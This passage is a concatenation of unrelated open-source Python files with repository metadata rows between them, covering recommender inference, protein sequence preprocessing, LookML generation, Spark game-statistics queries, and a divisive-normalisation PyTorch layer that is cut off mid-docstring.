                        pred=params['pred'],
                        use_popularity=params['use_popularity'],
                        weight_popularity=params['weight_popularity']
                        )
    # Postprocess: user & item ids
    processed_recs = postprocess_recs(recs,
                                      pdt_id_df,
                                      ctm_id_df,
                                      params['item_id_type'],
                                      params['ctm_id_type'])
    print(processed_recs)
    return processed_recs
@click.command()
@click.option('--params_path', default='params.pkl',
              help='Path where the optimal hyperparameters found in the hyperparametrization were saved.')
@click.option('--user_ids', multiple=True, default=['all'],
              help="IDs of users for which to generate recommendations. Either list of user ids, or 'all'.")
@click.option('--use_saved_graph', count=True,
              help='If true, will use graph that was saved on disk. Need to import ID mapping for users & items.')
@click.option('--trained_model_path', default='model.pth',
              help='Path where fully trained model is saved.')
@click.option('--use_saved_already_bought', count=True,
              help='If true, will use already bought dict that was saved on disk.')
@click.option('--graph_path', default='graph.bin',
              help='Path where the graph was saved. Mandatory if use_saved_graph is True.')
@click.option('--ctm_id_path', default='ctm_id.pkl',
              help='Path where the mapping for customer was save. Mandatory if use_saved_graph is True.')
@click.option('--pdt_id_path', default='pdt_id.pkl',
              help='Path where the mapping for items was save. Mandatory if use_saved_graph is True.')
@click.option('--already_bought_path', default='already_bought.pkl',
              help='Path where the already bought dict was saved. Mandatory if use_saved_already_bought is True.')
@click.option('--k', default=10,
              help='Number of recs to generate for each user.')
@click.option('--remove', default=.99,
              help='Percentage of users to remove from graph if used_saved_graph = True. If more than 0, user_ids might'
                   ' not be in the graph. However, higher "remove" allows for faster inference.')
def main(params_path, user_ids, use_saved_graph, trained_model_path,
         use_saved_already_bought, graph_path, ctm_id_path, pdt_id_path,
         already_bought_path, k, remove):
    # CLI entry point: load saved hyperparameters and run on-demand inference.
    # (Kept as a comment, not a docstring: click would surface a docstring
    # as the command's --help text.)
    params = read_data(params_path)
    # k and remove come from the CLI options, not from the saved hyperparameters.
    params.pop('k', None)
    params.pop('remove', None)
    inference_ondemand(user_ids=user_ids,  # List or 'all'
                       use_saved_graph=use_saved_graph,
                       trained_model_path=trained_model_path,
                       use_saved_already_bought=use_saved_already_bought,
                       graph_path=graph_path,
                       ctm_id_path=ctm_id_path,
                       pdt_id_path=pdt_id_path,
                       already_bought_path=already_bought_path,
                       k=k,
                       remove=remove,
                       **params,
                       )


if __name__ == '__main__':
    main()
| 42.327511 | 120 | 0.573816 |
f9fd62eb176a26c3629cfbc22be516bafd9ae4e3 | 229 | py | Python | cs585/HW1/Eval.py | tiaotiao/applets | c583a4405ed18c7d74bfba49884525c43d114398 | [
"MIT"
] | null | null | null | cs585/HW1/Eval.py | tiaotiao/applets | c583a4405ed18c7d74bfba49884525c43d114398 | [
"MIT"
] | null | null | null | cs585/HW1/Eval.py | tiaotiao/applets | c583a4405ed18c7d74bfba49884525c43d114398 | [
"MIT"
] | null | null | null | import numpy as np
class Eval:
def __init__(self, pred, gold):
self.pred = pred
self.gold = gold
def Accuracy(self):
return np.sum(np.equal(self.pred, self.gold)) / float(len(self.gold))
| 22.9 | 77 | 0.593886 |
f9ff014150d49d6aa831781d7f5630eb634ba2c0 | 5,328 | py | Python | evolutron/tools/data_tools.py | thrakar9/Evolutron | 1b9b4c364fe531e5001fd9010898b96e0f5907d7 | [
"MIT"
] | 10 | 2017-11-30T20:30:12.000Z | 2021-04-10T21:45:12.000Z | evolutron/tools/data_tools.py | thrakar9/Evolutron | 1b9b4c364fe531e5001fd9010898b96e0f5907d7 | [
"MIT"
] | null | null | null | evolutron/tools/data_tools.py | thrakar9/Evolutron | 1b9b4c364fe531e5001fd9010898b96e0f5907d7 | [
"MIT"
] | 3 | 2019-06-20T15:13:42.000Z | 2020-03-24T11:44:07.000Z | # coding=utf-8
from functools import partial
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from .seq_tools import aa2hot
from ..tools import io_tools as io
def data_it(dataset, block_size, multi_data=False):
""" Iterates through a large array, yielding chunks of block_size.
"""
size = len(dataset)
for start_idx in range(0, size, block_size):
excerpt = slice(start_idx, min(start_idx + block_size, size))
if multi_data:
yield [x[excerpt] for x in dataset]
else:
yield dataset[excerpt]
def pad_or_clip_seq(x, n):
if n >= x.shape[0]:
b = np.zeros((n, x.shape[1]))
b[:x.shape[0]] = x
return b
else:
return x[:n, :]
def pad_or_clip_img(x, n):
assert x.shape[0] == x.shape[1], 'Image should be two dimensional with equal dimensions'
if n >= x.shape[0]:
b = np.zeros((n, n))
b[:x.shape[0], :x.shape[1]] = x
return b
else:
return x[:n, :n]
def random_aa_sequence(size):
aa = ['A', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'K', 'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'Y']
aa_probs = np.array([0.0825, 0.0135, 0.0545, 0.0675, 0.0385, 0.0705, 0.0225,
0.0595, 0.0585, 0.0965, 0.0245, 0.0405, 0.0475, 0.0395,
0.0555, 0.0665, 0.0535, 0.0685, 0.0105, 0.0295])
return 'M' + ''.join(np.random.choice(aa, size=size, p=aa_probs))
def load_random_aa_seqs(n, length=None, min_length=100, max_length=1000):
if length:
return pd.Series([random_aa_sequence(length) for _ in range(n)])
else:
return pd.Series([random_aa_sequence(np.random.randint(min_length, max_length)) for _ in range(n)])
def preprocess_dataset(x_data, y_data=None, one_hot='x', padded=True, pad_y_data=False, nb_aa=20, min_aa=None,
max_aa=None):
"""
Args:
x_data (pd.Series):
y_data (list or np.ndArray):
one_hot (str):
padded (bool):
pad_y_data (bool):
nb_aa:
min_aa:
max_aa:
Returns:
"""
if 'x' in one_hot:
x_data = x_data.apply(lambda x: aa2hot(x, nb_aa)).tolist()
else:
x_data = x_data.tolist()
if 'y' in one_hot:
pass
if padded:
if not max_aa:
max_aa = int(np.percentile([len(x) for x in x_data], 99)) # pad so that 99% of datapoints are complete
else:
max_aa = min(max_aa, np.max([len(x) for x in x_data]))
x_data = np.asarray([pad_or_clip_seq(x, max_aa) for x in x_data], dtype=np.float32)
if min_aa:
min_aa = max(min_aa, np.max([len(x) for x in x_data]))
x_data = np.asarray([pad_or_clip_seq(x, min_aa) for x in x_data], dtype=np.float32)
if y_data:
if padded and pad_y_data:
y_data = np.asarray([pad_or_clip_seq(y, min_aa) for y in y_data])
else:
y_data = np.asarray(y_data)
assert ((len(x_data) == len(y_data)) or (len(x_data) == len(y_data[0])))
data_size = len(x_data)
print('Dataset size: {0}'.format(data_size))
return x_data, y_data
else:
data_size = len(x_data)
print('Dataset size: {0}'.format(data_size))
return x_data
def load_dataset(infile, codes=None, code_key=None, nb_aa=20, **parser_options):
"""
Loads the Evolutron formatted dataset from the input file. Automatically recognizes file format and calls
corresponding parser.
Args:
infile:
codes:
code_key:
nb_aa:
**parser_options:
Returns: The dataset with the appropriate format given the options.
"""
filename = infile
filetype = filename.split('.')[-1]
if filetype == 'tsv':
x_data, y_data = io.csv_parser(filename, codes, code_key, sep='\t')
elif filetype == 'csv':
x_data, y_data = io.csv_parser(filename, codes, code_key, sep=',')
elif filetype == 'fasta':
x_data, y_data = io.fasta_parser(filename, codes, code_key)
elif filetype == 'sec':
x_data, y_data = io.secs_parser(filename, nb_aa=nb_aa, **parser_options)
elif filetype == 'gz':
x_data, y_data = io.npz_parser(filename, nb_aa=nb_aa, **parser_options)
elif filetype == 'h5':
x_data, y_data = io.h5_parser(filename, **parser_options)
else:
raise NotImplementedError('There is no parser for current file type.')
return x_data, y_data
def train_valid_split(x, y, nb_inputs=1, nb_outputs=1, validation_split=0.0, stratify=None, shuffle=True):
seed = np.random.randint(0, 10)
split_func = partial(train_test_split, test_size=validation_split, stratify=stratify, shuffle=shuffle,
random_state=seed)
if nb_inputs == 1:
x_train, x_valid = split_func(x)
else:
x_train = [[] for _ in x]
x_valid = [[] for _ in x]
for i, x_d in enumerate(x):
x_train[i], x_valid[i] = split_func(x_d)
if nb_outputs == 1:
y_train, y_valid = split_func(y)
else:
y_train = [[] for _ in y]
y_valid = [[] for _ in y]
for i, y_d in enumerate(y):
y_train[i], y_valid[i] = split_func(y_d)
return x_train, y_train, x_valid, y_valid
| 31.714286 | 115 | 0.593844 |
f9ff05579682158568bfec5a2b8abe73eaf5622f | 1,894 | py | Python | magic_timer/format_seconds.py | sradc/magic-timer | 02e95ae7e96787871bd243a2a6a3e14d8615560e | [
"MIT"
] | 2 | 2020-09-10T15:43:28.000Z | 2020-09-11T08:14:36.000Z | magic_timer/format_seconds.py | sradc/magic-timer | 02e95ae7e96787871bd243a2a6a3e14d8615560e | [
"MIT"
] | 1 | 2020-09-10T10:55:04.000Z | 2020-09-10T12:40:15.000Z | magic_timer/format_seconds.py | sradc/magic-timer | 02e95ae7e96787871bd243a2a6a3e14d8615560e | [
"MIT"
] | 1 | 2020-03-06T09:07:54.000Z | 2020-03-06T09:07:54.000Z | """Turn time in seconds into a readable string.
"""
import math
from typing import Union, Tuple
# Unit name -> size in seconds, largest first. Order matters:
# _convert_to_appropriate_unit picks the first unit that fits.
TIME_UNITS = (  # Order matters
    ("days", 24 * 60 * 60),
    ("hours", 60 * 60),
    ("minutes", 60),
    ("seconds", 1),
    ("milliseconds", 1 / 1000),
    ("microseconds", 1 / 1000_000),
)
def format_seconds(seconds: float) -> str:
    """Render a duration in seconds as a short human-readable string.

    E.g. format_seconds(45.38) -> '46 seconds'
         format_seconds(434) -> '7.3 minutes'
    """
    try:
        magnitude, unit = _convert_to_appropriate_unit(seconds)
    except ValueError:
        # Smaller than the smallest unit we know about.
        return f"t < 1 {TIME_UNITS[-1][0]}"
    return f"{_round_appropriately(magnitude, unit)} {unit}"
def _convert_to_appropriate_unit(value_in_seconds: float) -> Tuple[float, str]:
    """Pick the largest unit in TIME_UNITS that fits into `value_in_seconds`.

    Returns (converted value, unit name); raises ValueError when the value
    is below even the smallest unit.
    """
    for unit_name, unit_seconds in TIME_UNITS:
        if value_in_seconds >= unit_seconds:
            return value_in_seconds / unit_seconds, unit_name
    raise ValueError("`value_in_seconds` is smaller than the smallest time unit.")
def _round_appropriately(value: float, unit: str) -> Union[int, float]:
"""Round *up* to 2 significant figures
(except for unit="days", and value>=100, which is just rounded
to the nearest whole number).
Round up because it's better to overestimate than underestimate
time taken.
"""
num_integer_digits = len(str(int(value)))
if num_integer_digits <= 1:
return math.ceil(value * 10) / 10
elif num_integer_digits == 2:
return math.ceil(value)
elif num_integer_digits == 3:
if unit == "days":
return math.ceil(value)
return math.ceil(value / 10) * 10
else:
if unit == "days":
return math.ceil(value)
raise ValueError("Should not have more than 3 digits.")
| 31.566667 | 82 | 0.637276 |
f9ff74d919dcc09d02f35b81da80d879d34feb93 | 6,458 | py | Python | lookmlgen/view.py | jimmyshah/lookml-gen2 | 7814d2ea6cf302ef7b937e3365d047b09a9878b4 | [
"Apache-2.0"
] | 31 | 2017-04-18T03:40:38.000Z | 2022-02-14T23:06:02.000Z | lookmlgen/view.py | jimmyshah/lookml-gen2 | 7814d2ea6cf302ef7b937e3365d047b09a9878b4 | [
"Apache-2.0"
] | 368 | 2017-05-15T07:43:38.000Z | 2022-03-28T08:55:21.000Z | lookmlgen/view.py | jimmyshah/lookml-gen2 | 7814d2ea6cf302ef7b937e3365d047b09a9878b4 | [
"Apache-2.0"
] | 10 | 2017-05-23T03:45:23.000Z | 2021-08-10T20:19:55.000Z | """
File name: view.py
Author: joeschmid
Date created: 4/8/17
"""
import json
from collections import OrderedDict
try:
from textwrap import indent
except ImportError:
from .util import indent
from .base_generator import BaseGenerator
from .field import FieldType
class View(BaseGenerator):
"""Generates a LookML View
Initialize a View object with your parameters,
add Fields such as :class:`~lookmlgen.field.Dimension`,
:class:`~lookmlgen.field.Measure`,
:class:`~lookmlgen.field.DimensionGroup`, and
:class:`~lookmlgen.field.Filter`, and then
generate LookML for the view using :py:meth:`~View.generate_lookml`
:param name: Name of the view
:param label: Label to use for the view (may contain spaces)
:param sql_table_name: Name of the SQL table to use in the view
:param file: File handle of a file open for writing or a
StringIO object
:type name: string
:type label: string
:type sql_table_name: list of strings
:type file: File handle or StringIO object
"""
def __init__(self, name, label=None, sql_table_name=None, file=None):
super(View, self).__init__(file=file)
self.name = name
self.label = label
self.sql_table_name = sql_table_name
self.fields = OrderedDict()
self.derived_table = None
def generate_lookml(self, file=None, format_options=None):
""" Writes LookML for the view to a file or StringIO buffer.
:param file: File handle of a file open for writing or a
StringIO object
:param format_options: Formatting options to use during generation
:type file: File handle or StringIO object
:type format_options:
:class:`~lookmlgen.base_generator.GeneratorFormatOptions`
"""
if not file and not self.file:
raise ValueError('Must provide a file in either the constructor '
'or as a parameter to generate_lookml()')
f = file if file else self.file
fo = format_options if format_options else self.format_options
if fo.warning_header_comment:
f.write(fo.warning_header_comment)
f.write('view: {self.name} {{\n'.format(self=self))
if self.sql_table_name:
f.write('{indent}sql_table_name: {self.sql_table_name} ;;\n'.
format(indent=' ' * fo.indent_spaces, self=self))
if self.label:
f.write('{indent}label: "{self.label}"\n'.
format(indent=' ' * fo.indent_spaces, self=self))
if fo.newline_between_items:
f.write('\n')
if self.derived_table:
self.derived_table.generate_lookml(file=f, format_options=fo)
if fo.newline_between_items:
f.write('\n')
if fo.view_fields_alphabetical:
self.__ordered_fields = sorted(self.fields.items())
else:
self.__ordered_fields = self.fields.items()
self.__generated_fields = []
self._gen_fields(f, fo, [FieldType.FILTER])
self._gen_fields(f, fo, [FieldType.DIMENSION, FieldType.DIMENSION_GROUP])
self._gen_fields(f, fo, [FieldType.MEASURE])
f.write('}\n')
return
def add_field(self, field):
"""Adds a :class:`~lookmlgen.field.Field` object to a :class:`View`"""
self.fields[field.name] = field
return
def set_derived_table(self, derived_table):
"""Adds a :class:`~lookmlgen.view.DerivedTable` object to a
:class:`View`
"""
self.derived_table = derived_table
def _gen_fields(self, f, fo, field_types):
for k, d in self.__ordered_fields:
if d.field_type not in field_types:
continue
if len(self.__generated_fields) != 0 and fo.newline_between_items:
f.write('\n')
d.generate_lookml(file=f, format_options=fo)
self.__generated_fields.append(d)
class DerivedTable(BaseGenerator):
"""Generates the LookML View parameters to support derived
tables, including persistent derived tables (PDTs).
:param sql: SQL statement to execute
:param sql_trigger_value: SQL to determine when to trigger build
:param indexes: List of coluxn names to use as indexes
:param file: File handle of a file open for writing or a StringIO object
:type sql: string
:type sql_trigger_value: string
:type indexes: list of strings
:type file: File handle or StringIO object
"""
def __init__(self, sql, sql_trigger_value=None, indexes=None, file=None):
super(DerivedTable, self).__init__(file=file)
self.sql = sql
self.sql_trigger_value = sql_trigger_value
self.indexes = indexes
def generate_lookml(self, file=None, format_options=None):
""" Writes LookML for a derived table to a file or StringIO buffer.
:param file: File handle of a file open for writing or a
StringIO object
:param format_options: Formatting options to use during generation
:type file: File handle or StringIO object
:type format_options:
:class:`~lookmlgen.base_generator.GeneratorFormatOptions`
"""
if not file and not self.file:
raise ValueError('Must provide a file in either the constructor '
'or as a parameter to generate_lookml()')
f = file if file else self.file
fo = format_options if format_options else self.format_options
f.write('{indent}derived_table: {{\n'.
format(indent=' ' * fo.indent_spaces))
if self.sql:
final_sql = ' ' + self.sql if '\n' not in self.sql \
else '\n' + indent(self.sql, ' ' * 3 * fo.indent_spaces)
f.write('{indent}sql:{sql} ;;\n'.
format(indent=' ' * 2 * fo.indent_spaces, sql=final_sql))
if self.sql_trigger_value:
f.write('{indent}sql_trigger_value: '
'{self.sql_trigger_value} ;;\n'.
format(indent=' ' * 2 * fo.indent_spaces, self=self))
if self.indexes:
f.write('{indent}indexes: {indexes}\n'.
format(indent=' ' * 2 * fo.indent_spaces,
indexes=json.dumps(self.indexes)))
f.write('{indent}}}\n'.format(indent=' ' * fo.indent_spaces))
| 38.670659 | 81 | 0.623877 |
e6009ec1e028167f3a49c3031f357398c17f1387 | 663 | py | Python | models/functions/main.py | hkennyv/meowbot | c5a0d3c2a21cc0ef1bc5f266e15e3a8ca6f1fb02 | [
"MIT"
] | null | null | null | models/functions/main.py | hkennyv/meowbot | c5a0d3c2a21cc0ef1bc5f266e15e3a8ca6f1fb02 | [
"MIT"
] | null | null | null | models/functions/main.py | hkennyv/meowbot | c5a0d3c2a21cc0ef1bc5f266e15e3a8ca6f1fb02 | [
"MIT"
] | null | null | null | import os
from flask import jsonify
from utils import generate_text_from_model
def handler(request):
    """Cloud-function entry point: generate text from the model, return JSON.

    Query parameters:
        prompt: optional seed text for generation (default None).
        n: number of generations to produce (default 1).
    """
    url = request.url
    prompt = request.args.get("prompt", None)
    # NOTE(review): int() raises ValueError on a non-numeric ?n= value —
    # confirm whether upstream validates it.
    n = int(request.args.get("n", 1))
    print(f"{url=} {prompt=} {n=}")
    res = generate_text_from_model(n, prompt, min_length=25)
    return (
        jsonify(
            {
                "version": 0.1,
                "entry_point": os.environ.get("ENTRY_POINT", ""),
                "function_name": os.environ.get("FUNCTION_NAME", ""),
                "region": os.environ.get("FUNCTION_REGION", ""),
                "results": res,
            }
        ),
        200,
    )
| 23.678571 | 69 | 0.529412 |
e6032655721c54e66ad4bd1357c8c09c9c05f5d4 | 1,788 | py | Python | setup.py | vikingco/django-smsgateway | 91675e599a147f4d7e64ff4c4455dbf75ed753d3 | [
"BSD-3-Clause"
] | 13 | 2015-03-11T06:55:50.000Z | 2022-02-08T16:50:16.000Z | setup.py | vikingco/django-smsgateway | 91675e599a147f4d7e64ff4c4455dbf75ed753d3 | [
"BSD-3-Clause"
] | 17 | 2015-03-19T12:27:41.000Z | 2019-12-09T14:21:21.000Z | setup.py | vikingco/django-smsgateway | 91675e599a147f4d7e64ff4c4455dbf75ed753d3 | [
"BSD-3-Clause"
] | 7 | 2015-05-15T00:14:49.000Z | 2019-06-27T02:46:09.000Z | from setuptools import setup, find_packages
from pip._internal.req.req_file import parse_requirements
from pip._internal.download import PipSession
from os import path

from smsgateway import __version__


def _parse_requirements_file(requirements_path):
    """Parse a pip requirements file.

    Returns a ``(requirements, links)`` tuple holding the requirement
    specifier strings and any dependency links declared in the file.
    """
    requirements = []
    links = []
    for req in parse_requirements(requirements_path, session=PipSession()):
        requirements.append(str(req.req))
        if req.link:
            links.append(str(req.link))
    return requirements, links


# Runtime and test requirements live in separate files; dependency links
# from both files are collected into a single list.
install_requires, dependency_links = _parse_requirements_file(
    path.join('requirements', 'requirements.txt'))
tests_require, test_dependency_links = _parse_requirements_file(
    path.join('.', 'requirements', 'requirements_test.txt'))
dependency_links.extend(test_dependency_links)

# Read the long description with a context manager so the file handle is
# closed deterministically (the previous inline open() leaked it).
with open('README.rst', 'r') as readme_file:
    long_description = readme_file.read()

setup(
    name='django-smsgateway',
    version=__version__,
    url='https://github.com/vikingco/smsgateway',
    license='BSD',
    description='SMS gateway for sending text messages',
    long_description=long_description,
    author='Unleashed NV',
    author_email='operations@unleashed.be',
    packages=find_packages('.'),
    include_package_data=True,
    zip_safe=False,
    install_requires=install_requires,
    setup_requires=['pytest-runner', ],
    tests_require=tests_require,
    dependency_links=dependency_links,
    classifiers=[
        'Intended Audience :: Developers',
        'Programming Language :: Python',
        'Operating System :: OS Independent',
        'Environment :: Web Environment',
        'Framework :: Django',
    ],
)
| 33.735849 | 122 | 0.73434 |
e603924130bfa4f0b3913ce47ce5a8e5befed2ec | 2,394 | py | Python | querier/queries/filtr.py | Techtonique/querier | 47288fc78273f248199fc67b50e96eaa7dd5441a | [
"BSD-3-Clause-Clear"
] | 2 | 2020-09-18T14:58:28.000Z | 2021-07-14T11:57:14.000Z | querier/queries/filtr.py | Techtonique/querier | 47288fc78273f248199fc67b50e96eaa7dd5441a | [
"BSD-3-Clause-Clear"
] | null | null | null | querier/queries/filtr.py | Techtonique/querier | 47288fc78273f248199fc67b50e96eaa7dd5441a | [
"BSD-3-Clause-Clear"
] | null | null | null | # Authors: Thierry Moudiki
#
# License: BSD 3
import numpy as np
from ..utils import parse_request
from ..utils import memoize
# filtr(df, 'tip > 5')
# req = "(time == 'Dinner') & (day == 'Sun') & (tip>1.5)"
# filtr(df, req, limit=3, random=False)
# filtr(df, req, limit=4, random=True)
#
# req = "(tip>1.5)"
# filtr(df, req, limit=3, random=False)
# filtr(df, req, limit=5, random=True)
#
# req = "(tip > 5) & (size > 3)"
# filtr(df, req, limit=5, random=False)
# filtr(df, req, limit=8, random=True)
#
# req = "(tip > 5) & (size > 3) & (sex == 'Male')"
# filtr(df, req, limit=7, random=False)
# filtr(df, req, limit=8, random=True)
@memoize
def filtr(df, req=None, limit=None, random=False, seed=123):
    """Filter rows of ``df`` based on the given criteria.

    Args:
        df: the input DataFrame.
        req: str
            criteria for filtering the rows; ``None`` returns ``df``
            unchanged.
        limit: int
            number of records to be retrieved (``None`` keeps every
            matching row).
        random: bool
            ``True`` to retrieve a random sample of the matching rows
            instead of the first ``limit`` of them.
        seed: int
            reproducibility seed used when ``random`` is ``True``.

    Raises:
        ValueError: if the request cannot be evaluated against ``df``
            (e.g. wrong column names or unbalanced parentheses).
        AssertionError: if ``limit`` is not an integer.

    Examples:
        https://github.com/thierrymoudiki/querier/tree/master/querier/demo
    """
    if req is None:  # useless tho...
        return df

    str_conds = parse_request(req)
    # The evaluation is the statement that actually fails on a bad request;
    # previously it was unguarded while bare `except:` blocks wrapped plain
    # `return` statements that could never raise.
    # NOTE: the parsed request is executed with `eval`, so `req` must come
    # from a trusted source.
    try:
        df_res = df[eval(str_conds)]
    except Exception as err:
        raise ValueError(
            "invalid request: check column names + contents "
            "(and parentheses for multiple conditions)"
        ) from err

    if limit is None:
        return df_res

    assert int(limit) == limit, "limit must be an integer"

    if not random:
        return df_res.head(limit)

    # Reproducible random sample of `limit` distinct matching rows.
    np.random.seed(seed)
    rows = np.random.choice(range(0, df_res.shape[0]), size=limit,
                            replace=False)
    return df_res.iloc[rows]
| 25.2 | 110 | 0.543442 |
e605177b0e5e0389026fb9fd1bf99e17303d4553 | 3,310 | py | Python | apps/jobs/dota_parse_curated/insights/skill_insights.py | ajkdrag/Dota-2-Pyspark-EDA | aa64cd06248143703792ad668288518804679735 | [
"MIT"
] | null | null | null | apps/jobs/dota_parse_curated/insights/skill_insights.py | ajkdrag/Dota-2-Pyspark-EDA | aa64cd06248143703792ad668288518804679735 | [
"MIT"
] | null | null | null | apps/jobs/dota_parse_curated/insights/skill_insights.py | ajkdrag/Dota-2-Pyspark-EDA | aa64cd06248143703792ad668288518804679735 | [
"MIT"
] | null | null | null | import pyspark.sql.functions as F
def top_k_most_picked_skills(match_hero_names_df, ohe_heroes_df, k=5):
    """Return the ``k`` skills with the highest total pick counts.

    Joins the per-match hero rows onto the one-hot-encoded hero table,
    sums each one-hot skill column, then unpivots the totals into
    ``(skill, num_picks)`` rows ordered by popularity.
    """
    # The one-hot skill columns start at index 3 of the encoded hero table.
    skill_columns = ohe_heroes_df.columns[3:]
    joined = match_hero_names_df.join(
        ohe_heroes_df, on=[match_hero_names_df.hero == ohe_heroes_df.name]
    )
    per_match_skills = joined.select(skill_columns)

    totals = per_match_skills.select(
        [F.sum(name).alias(name) for name in skill_columns]
    )

    # Unpivot: one struct per skill column, exploded into rows.
    skill_structs = [
        F.struct(F.lit(name).alias("skill"), F.col(name).alias("num_picks"))
        for name in skill_columns
    ]
    unpivoted = totals.select(
        F.explode(F.array(skill_structs)).alias("exploded")
    ).select("exploded.*")
    return unpivoted.orderBy(F.desc("num_picks")).limit(k)
def top_k_skills_in_most_wins(
    match_hero_names_df, match_details_df, ohe_heroes_df, k=5
):
    """Return the ``k`` skills that appear most often on winning teams.

    Restricts the per-match hero rows to those whose team won the match,
    then delegates the counting to :func:`top_k_most_picked_skills`.
    """
    winning_rows = match_hero_names_df.join(
        match_details_df,
        on=[
            match_hero_names_df.match_id == match_details_df.match_id,
            match_hero_names_df.team == match_details_df.winner,
        ],
    )
    return top_k_most_picked_skills(winning_rows, ohe_heroes_df, k=k)
def top_k_skills_with_highest_win_rates(
    match_hero_names_df, match_details_df, ohe_heroes_df, k=10
):
    """Return the ``k`` skills with the highest win percentage.

    For every hero appearance a binary ``score`` marks whether that hero's
    team won.  The one-hot skill columns are unpivoted into
    ``(skill, wins, picks)`` rows, aggregated per skill, and ranked by
    ``win_rate`` (a percentage).
    """
    appearances = match_hero_names_df.join(
        match_details_df,
        on=[match_hero_names_df.match_id == match_details_df.match_id],
    ).select(
        [
            match_hero_names_df.match_id,
            match_hero_names_df.hero,
            match_hero_names_df.team,
            "winner",
        ]
    )
    # score == 1 when the hero's team won the match, 0 otherwise.
    scored = appearances.withColumn(
        "score",
        F.when(F.col("winner") == F.col("team"), F.lit(1)).otherwise(F.lit(0)),
    )

    # One-hot skill columns start at index 3 of the encoded hero table.
    skill_columns = ohe_heroes_df.columns[3:]
    with_skills = scored.join(
        ohe_heroes_df, on=[scored.hero == ohe_heroes_df.name]
    )

    # Unpivot each one-hot column into a (skill, wins, picks) struct.
    skill_structs = [
        F.struct(
            F.lit(name).alias("skill"),
            (F.col("score") * F.col(name)).alias("wins"),
            (F.col(name)).alias("picks"),
        )
        for name in skill_columns
    ]
    exploded = with_skills.select(
        F.explode(F.array(skill_structs)).alias("exploded")
    ).select("exploded.*")

    per_skill = exploded.groupBy("skill").agg(
        F.sum("picks").alias("total_picks"),
        F.sum("wins").alias("total_wins"),
    )
    ranked = per_skill.withColumn(
        "win_rate", (100 * F.col("total_wins")) / F.col("total_picks")
    )
    return ranked.orderBy(F.desc("win_rate")).limit(k)
def get_all_skill_insights(entities):
    """Compute every skill insight and store it back into ``entities``.

    Reads the ``match_hero_names``, ``ohe_heroes`` and ``match_details``
    DataFrames from ``entities`` and adds one ``insight_*`` entry per
    computed insight.
    """
    hero_names = entities["match_hero_names"]
    ohe_heroes = entities["ohe_heroes"]
    match_details = entities["match_details"]

    entities["insight_most_picked_skills"] = top_k_most_picked_skills(
        hero_names, ohe_heroes
    )
    entities["insight_skills_in_most_wins"] = top_k_skills_in_most_wins(
        hero_names, match_details, ohe_heroes
    )
    entities["insight_skills_with_highest_wr"] = (
        top_k_skills_with_highest_win_rates(hero_names, match_details,
                                            ohe_heroes)
    )
| 31.52381 | 88 | 0.652266 |
e6053698599b3626d8934d6ed2fbd3ec5c67702d | 271 | py | Python | Physics250-ME24/calcChargeonCap.py | illusion173/Physics250 | 69f2ffdb8af013e8b0739779861c1455b579ddaf | [
"MIT"
] | null | null | null | Physics250-ME24/calcChargeonCap.py | illusion173/Physics250 | 69f2ffdb8af013e8b0739779861c1455b579ddaf | [
"MIT"
] | null | null | null | Physics250-ME24/calcChargeonCap.py | illusion173/Physics250 | 69f2ffdb8af013e8b0739779861c1455b579ddaf | [
"MIT"
] | null | null | null | import numpy as np
import math
Esubo = 8.854 * pow(10,-12)
k = 8.988 * pow(10,9)
def calcCharge():
faraday = float(input("Input Faraday: "))
volts = float(input("Input Volts: "))
charge = faraday * volts
print(charge)
calcCharge() | 14.263158 | 45 | 0.583026 |
e6056330329bc68abb7e5b76c93b9c6288226754 | 9,217 | py | Python | expert/layers/divisive_normalisation.py | alexhepburn/expert | 546f7452ced2213ef91e5ce6e7456a1668dd9f95 | [
"BSD-3-Clause"
] | 1 | 2021-04-10T11:34:22.000Z | 2021-04-10T11:34:22.000Z | expert/layers/divisive_normalisation.py | alexhepburn/expert | 546f7452ced2213ef91e5ce6e7456a1668dd9f95 | [
"BSD-3-Clause"
] | null | null | null | expert/layers/divisive_normalisation.py | alexhepburn/expert | 546f7452ced2213ef91e5ce6e7456a1668dd9f95 | [
"BSD-3-Clause"
] | null | null | null | """
The :mod:`expert.layers.divisive_normalisation` module holds classes of
layers for a network that use divisive normalisation. This includes
generalised divisive normalisation.
"""
# Author: Alex Hepburn <alex.hepburn@bristol.ac.uk>
# License: new BSD
import torch
import torch.nn as nn
import torch.nn.functional as F
__all__ = ['GDN']
class GDN(nn.Module):
    """
    Generalised Divisive Normalisation proposed in [BALLE2015GDN]_.

    The activation function this layer implements when kernel size is 1 is
    given by:

    .. math::
        y[i] = x[i] / sqrt(beta[i] + sum_j(gamma[j, i] * x[j]^2))

    where `i` and `j` run over channels.

    If the kernel_size is kept to the default value of 1, this represents the
    true generalised divisive normalisation proposed in [BALLE2015GDN]_. If
    the kernel size is larger than 1, the convolution acts not only channel
    wise but also acts spatially. This is called spatial generalised
    divisive normalisation.

    .. [BALLE2015GDN] Ballé, Johannes, et al. Density Modeling of Images
       Using a Generalized Normalization Transformation. Nov. 2015.
       arxiv.org, https://arxiv.org/abs/1511.06281v4.

    Parameters
    ----------
    n_channels : int
        Number of channels that the input to this layer will have.
    kernel_size : int, optional (default=1)
        Size of the kernel. A square kernel is always used and will have
        shape [kernel_size, kernel_size].
    stride : int, optional (default=1)
        The stride of the convolution in the forward pass.
    padding : int, optional (default=0)
        The padding to be used in the convolution in the forward pass. In
        order to get the output of the convolution to be the same size as
        the input, to avoid having to interpolate, then the ``padding``
        parameter should be chosen carefully.
    gamma_init : float, optional (default=0.1)
        The value that the gamma matrix will be initialised with, it will
        be the identity multiplied by this value.
    reparam_offset : float, optional (default=2**-18)
        Offset keeping gamma and beta away from zero so their gradients do
        not vanish when backpropagating.
    beta_min : float, optional (default=1e-6)
        The minimum value that the beta value can reach.
    apply_independently : boolean, optional (default=False)
        A boolean that determines whether this operation is applied channel
        wise or not. If ``True`` each channel is normalised only by itself
        (grouped convolution, one group per channel).

    Raises
    ------
    TypeError
        ``n_channels`` parameter is not an integer larger than 0.
        ``stride`` parameter is not an integer larger than 0. ``padding``
        parameter is not an integer larger or equal to 0. ``gamma_init``
        parameter is not a positive float. ``reparam_offset`` parameter is
        not a positive float. ``beta_min`` parameter is not a positive
        float. ``apply_independently`` is not a boolean.

    Attributes
    ----------
    reparam_offset : float
        Reparameterisation offset that keeps gamma/beta away from zero.
    beta_reparam : float
        Reparameterisation offset for the beta parameter specifically.
    groups : int
        Number of groups used in the convolution operation: ``n_channels``
